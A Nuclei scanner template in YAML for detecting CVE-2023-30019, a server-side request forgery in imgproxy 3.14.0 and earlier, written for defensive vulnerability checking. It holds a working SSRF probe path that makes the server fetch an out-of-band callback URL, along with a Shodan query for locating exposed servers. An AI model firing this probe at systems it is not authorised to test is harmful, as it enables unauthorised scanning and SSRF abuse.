46 lines
1.4 KiB
YAML
46 lines
1.4 KiB
YAML
id: CVE-2023-30019
|
|
|
|
info:
|
|
name: Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)
|
|
author: DhiyaneshDK
|
|
severity: medium
|
|
description: |
|
|
imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.
|
|
remediation: |
|
|
Upgrade to a version of Imgproxy that is not affected by this vulnerability.
|
|
reference:
|
|
- https://breakandpray.com/cve-2023-30019-ssrf-in-imgproxy/
|
|
- https://github.com/imgproxy/imgproxy
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2023-30019
|
|
cwe-id: CWE-918
|
|
epss-score: 0.00094
|
|
epss-percentile: 0.39624
|
|
cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: evilmartians
|
|
product: imgproxy
|
|
shodan-query: "Server: imgproxy"
|
|
tags: cve,cve2023,imgproxy,ssrf,oast
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- Invalid source image
|
|
|
|
- type: status
|
|
status:
|
|
- 422
|
|
|
|
# digest: 4a0a00473045022100b39ff3e373277956c75143956c0c455609db23611260d524aac7fd24cc813ea802206226da6ca823b4db5fd8d5710902a0a59e4c565b090aba7a5a6e5875fe3da716:922c64590222798bb761d5b6d8e72950
|